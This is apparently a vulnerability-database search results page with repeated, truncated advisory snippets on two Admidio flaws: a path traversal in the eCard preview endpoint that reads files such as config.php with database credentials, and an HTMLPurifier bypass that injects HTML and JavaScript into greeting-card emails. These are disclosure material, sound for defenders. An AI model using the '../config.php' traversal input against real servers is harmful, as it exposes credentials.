34 matches found
CVE-2026-41655
Admidio is an open-source user management solution. Prior to version 5.0.9, the ecardpreview.php endpoint does not validate that the ecardtemplate POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload e.g.,...
CVE-2026-41655
Summary of CVE-2026-41655 (Admidio) : The vulnerability is a path traversal in the ecard_preview.php endpoint. Before version 5.0.9, the ecard_template parameter is not validated as a safe filename, allowing an authenticated user to craft paths like ../config.php to read arbitrary files accessibl...
CVE-2026-41655 Admidio: Path Traversal in ECard Preview Allows Reading Arbitrary Server Files Including Database Credentials
Admidio is an open-source user management solution. Prior to version 5.0.9, the ecardpreview.php endpoint does not validate that the ecardtemplate POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload e.g.,...
CVE-2026-41655
Admidio is an open-source user management solution. Prior to version 5.0.9, the ecardpreview.php endpoint does not validate that the ecardtemplate POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload e.g.,...
EUVD-2026-28263
Admidio is an open-source user management solution. Prior to version 5.0.9, the ecardpreview.php endpoint does not validate that the ecardtemplate POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload e.g.,...
CVE-2026-41655 Admidio: Path Traversal in ECard Preview Allows Reading Arbitrary Server Files Including Database Credentials
Admidio is an open-source user management solution. Prior to version 5.0.9, the ecardpreview.php endpoint does not validate that the ecardtemplate POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload e.g.,...
Admidio 路径遍历漏洞
Admidio is a set of open-source member management systems developed by the Admidio team. This system supports features such as member lists, event management, message boards, photo albums, and downloads. Prior to Admidio 5.0.9, there was a path traversal vulnerability. This vulnerability stemmed...
Directory Traversal
Overview admidio/admidio is a free open source user management system for websites of organizations and groups. Affected versions of this package are vulnerable to Directory Traversal via the ecardpreview.php process. An attacker can access arbitrary files on the server, including sensitive...
Admidio has Path Traversal in ECard Preview that Allows Reading Arbitrary Server Files Including Database Credentials
Summary The ecardpreview.php endpoint does not validate that the ecardtemplate POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload e.g., ../config.php to read arbitrary files accessible to the web server process...
GHSA-M3VP-3JJM-GPMX Admidio has Path Traversal in ECard Preview that Allows Reading Arbitrary Server Files Including Database Credentials
Summary The ecardpreview.php endpoint does not validate that the ecardtemplate POST parameter is a safe filename before passing it to ECard::getEcardTemplate. An authenticated user can supply a path traversal payload e.g., ../config.php to read arbitrary files accessible to the web server process...
PT-2026-37139
Name of the Vulnerable Software and Affected Versions Admidio versions prior to 5.0.9 Description The 'ecard preview.php' endpoint fails to validate that the ecard template POST parameter is a safe filename before it is processed by the getEcardTemplate function. An authenticated user can exploit...
Admidio 跨站脚本漏洞
Admidio is a set of open-source member management systems developed by the Admidio team. This system supports features such as member lists, event management, message boards, photo albums, and downloads. Versions of Admidio 5.0.6 and earlier had a cross-site scripting vulnerability. This...
CVE-2026-32757 Admidio: HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $POST'ecardmessage' value instead of the HTMLPurifier-sanitized $formValues'ecardmessage' when constructing the greeting card HTML. This allows an authenticated attacker to inject...
CVE-2026-32757
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $POST'ecardmessage' value instead of the HTMLPurifier-sanitized $formValues'ecardmessage' when constructing the greeting card HTML. This allows an authenticated attacker to inject...
CVE-2026-32757 Admidio: HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $POST'ecardmessage' value instead of the HTMLPurifier-sanitized $formValues'ecardmessage' when constructing the greeting card HTML. This allows an authenticated attacker to inject...
CVE-2026-32757 Admidio: HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $POST'ecardmessage' value instead of the HTMLPurifier-sanitized $formValues'ecardmessage' when constructing the greeting card HTML. This allows an authenticated attacker to inject...
CVE-2026-32757
Admidio eCard HTML email injection vulnerability (CVE-2026-32757) arises from using the raw POST message instead of the HTMLPurifier-sanitized value when constructing the eCard HTML. The sanitize step runs during form validation but the sanitized value is never used; the template then embeds the ...
GHSA-4WR4-F2QF-X5WJ Admidio has an HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
Summary The eCard send handler in Admidio uses the raw $POST'ecardmessage' value instead of the HTMLPurifier-sanitized $formValues'ecardmessage' when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent t...
Cross-site Scripting (XSS)
Overview admidio/admidio is a free open source user management system for websites of organizations and groups. Affected versions of this package are vulnerable to Cross-site Scripting XSS in the ecardmessage handling process. An attacker can inject arbitrary HTML and JavaScript into greeting car...
Admidio has an HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
Summary The eCard send handler in Admidio uses the raw $POST'ecardmessage' value instead of the HTMLPurifier-sanitized $formValues'ecardmessage' when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent t...